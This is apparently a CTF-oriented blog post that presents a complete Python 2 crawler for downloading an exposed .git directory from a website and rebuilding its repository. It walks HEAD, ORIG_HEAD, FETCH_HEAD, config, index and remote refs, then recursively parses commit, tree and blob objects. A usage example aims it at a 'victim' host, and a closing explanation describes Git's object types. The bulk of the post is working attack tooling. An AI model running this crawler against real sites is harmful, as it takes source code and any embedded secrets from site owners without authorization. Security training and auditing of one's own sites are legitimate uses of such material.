Step-by-step with your own requirements
This is a simple .git crawler I wrote a while back for CTF: when a website leaves the .git/ path accessible, the entire repository can be pulled down by following a few fixed patterns.
#!/usr/bin/env python
# Copyright (c) 2015-2015 cmj <cmj@cmj.tw>. All rights reserved.
import os
import struct
import urllib2
import zlib
class Git(object):
    ''' Simple crawler for an exposed .git repo '''
    def __init__(cls, url, storage='cmj/.git'):
        ''' Initialise the local repo and ensure the host exposes .git '''
        cls._url_ = url
        cls.storage = storage
        ## Create the local storage directory, parents included
        if not os.path.isdir(storage):
            os.makedirs(storage)
        cls.HEAD()
        cls.ORIG_HEAD()
        cls.FETCH_HEAD()
        cls.config()
        cls.remote()
    def __call__(cls, seed):
        ''' Download .git/<seed> from the target, or None on HTTP error '''
        try:
            req = urllib2.urlopen('{0}/.git/{1}'.format(cls._url_, seed))
        except urllib2.HTTPError:
            return None
        else:
            return req.read()
    def __setitem__(cls, path, value):
        ''' Restore the downloaded file into the local repo '''
        if not value:
            return
        _p = '{0}/{1}'.format(cls.storage, path)
        ## Create any missing intermediate directories
        if not os.path.isdir(os.path.dirname(_p)):
            os.makedirs(os.path.dirname(_p))
        with open(_p, 'wb') as fd:
            fd.write(value)
    def commit(cls, seed):
        ''' Fetch the object and store it locally, recursing if possible '''
        seed = seed.strip()
        seed = 'objects/{0}/{1}'.format(seed[:2], seed[2:])
        if os.path.isfile('{0}/{1}'.format(cls.storage, seed)):
            return
        data = cls(seed)
        if not data:
            return
        cls[seed] = data
        ## Parse the loose object: '<type> <size>\x00<body>'
        data = zlib.decompress(data)
        fmt, size = data[:data.index('\x00')].split()
        data = data[data.index('\x00')+1:][:int(size)]
        if 'commit' == fmt:
            ## A commit references one tree and zero or more parents
            seed = [_.split()[1] for _ in data.split('\n')
                    if _.startswith(('tree ', 'parent '))]
            map(cls.commit, seed)
        elif 'tree' == fmt:
            ## Each tree entry is '<mode> <name>\x00' + 20 raw SHA-1 bytes
            seed = []
            while data:
                pos = data.index('\x00') + 1
                sha = struct.unpack('>IIIII', data[pos:pos+20])
                seed += [''.join(['%08x' % _ for _ in sha])]
                data = data[pos+20:]
            map(cls.commit, seed)
        elif 'blob' == fmt:
            ## Blobs are plain file contents and reference nothing
            pass
        else:
            raise NotImplementedError(fmt)
    def HEAD(cls):
        ''' Load .git/HEAD and related commits '''
        print 'Load .git/HEAD ...'
        data = cls('HEAD')
        if not data:
            raise SystemError('Site {0} does not expose .git'.format(cls._url_))
        cls['HEAD'] = data
        refs = data.split()[-1]
        seed = cls(refs)
        if seed:
            cls[refs] = seed
            cls.commit(seed)
        else:
            ## Detached HEAD: the file itself holds the commit id
            cls.commit(refs)
    def ORIG_HEAD(cls):
        ''' Load .git/ORIG_HEAD and related commits '''
        print 'Load .git/ORIG_HEAD ...'
        data = cls('ORIG_HEAD')
        if not data:
            ## ORIG_HEAD only exists after a merge/rebase/reset
            return
        cls['ORIG_HEAD'] = data
        cls.commit(data)
    def FETCH_HEAD(cls):
        ''' Load .git/FETCH_HEAD and related commits '''
        print 'Load .git/FETCH_HEAD ...'
        data = cls('FETCH_HEAD')
        if not data:
            return
        cls['FETCH_HEAD'] = data
        ## Each line starts with the fetched commit id
        seed = [_.split()[0] for _ in data.split('\n') if _]
        map(cls.commit, seed)
    def config(cls):
        ''' Load .git/config and .git/index '''
        print 'Load .git/config ...'
        cls['config'] = cls('config')
        cls['index'] = cls('index')
    def remote(cls):
        ''' Load .git/refs/remotes/origin/HEAD and related commits '''
        print 'Load .git/refs/remotes/origin/HEAD ...'
        data = cls('refs/remotes/origin/HEAD')
        if not data:
            return
        cls['refs/remotes/origin/HEAD'] = data
        refs = data.split()[-1]
        data = cls(refs)
        if not data:
            return
        cls[refs] = data
        cls.commit(data)
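With the class above, mirroring a leaky site takes one call. A minimal usage sketch (the target URL here is a made-up example):

## Mirror the exposed repository into ./cmj/.git
Git('http://victim.example.com')
## Afterwards, from the shell, let git rebuild the work tree
## from the downloaded index:
##   cd cmj && git checkout -- .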
The crawler works on a simple principle: a handful of files are guaranteed to exist under .git/, and they reveal which commits are out there. For example, .git/HEAD tells us which branch is currently checked out (e.g. refs/heads/master); from there we can follow the commit tree and fetch all the related commits.
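To make the first hop concrete, here is a stand-alone sketch of resolving HEAD by hand; the host name is again a made-up example:

import urllib2

base = 'http://victim.example.com/.git/'
head = urllib2.urlopen(base + 'HEAD').read()   ## e.g. 'ref: refs/heads/master'
tip = urllib2.urlopen(base + head.split()[-1]).read().strip()
print 'branch tip commit:', tip                ## the 40-char id to crawl from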
One thing to understand: each commit can involve three object types: commit, tree, and blob. The first records which other commits this commit is related to; a tree means the commit contains further nodes, and each such node may in turn be a tree or a blob; a blob is where the actual data is stored.
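These three types show up in the loose-object header that commit() parses. A self-contained sketch of that parsing; the object below is fabricated locally (its tree id is Git's well-known empty-tree hash) so nothing needs to be downloaded:

import zlib

## Fabricate a loose object; on a real target these bytes come from
## .git/objects/<first 2 chars>/<remaining 38 chars>
body = 'tree 4b825dc642cb6eb9a060e54bf8d69288fbee4904\n'
raw = zlib.compress('commit {0}\x00{1}'.format(len(body), body))

data = zlib.decompress(raw)
fmt, size = data[:data.index('\x00')].split()  ## header is '<type> <size>\x00'
data = data[data.index('\x00')+1:][:int(size)]
print fmt, size                                ## -> commit 46
## The ids to recurse into: the tree, plus any 'parent ' lines
print [_.split()[1] for _ in data.split('\n')
       if _.startswith(('tree ', 'parent '))]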